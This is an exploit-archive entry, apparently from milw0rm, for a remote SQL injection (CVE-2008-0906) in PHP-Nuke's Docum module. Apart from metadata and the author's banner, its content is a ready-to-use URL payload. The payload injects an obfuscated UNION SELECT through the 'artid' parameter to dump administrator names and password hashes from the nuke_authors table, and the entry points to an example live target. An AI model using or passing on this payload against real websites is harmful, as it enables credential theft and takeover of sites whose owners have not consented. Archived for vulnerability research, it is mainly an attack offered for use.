PHP-Nuke Module Docum - 'artid' SQL Injection

Author: DamaR
type: webapps
platform: php
port: 
date_added: 2008-02-19 
date_updated: 2016-11-11 
verified: 1 
codes: OSVDB-42411;CVE-2008-0906 
tags: 
aliases:  
screenshot_url:  
application_url:

#########################################################################

           php-nuke modules Docum remote sql inj
#########################################################################

Found:DamaR

By.Damar@Hotmail.Com

Hack Bitti ama DÃ¶nmek YakÄ±n  Since 2000
-------------------------------------------------------------------------------


/modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2

#########################################################################
Example: http://www.xxx.com.ar/mt/


#########################################################################

# milw0rm.com [2008-02-20]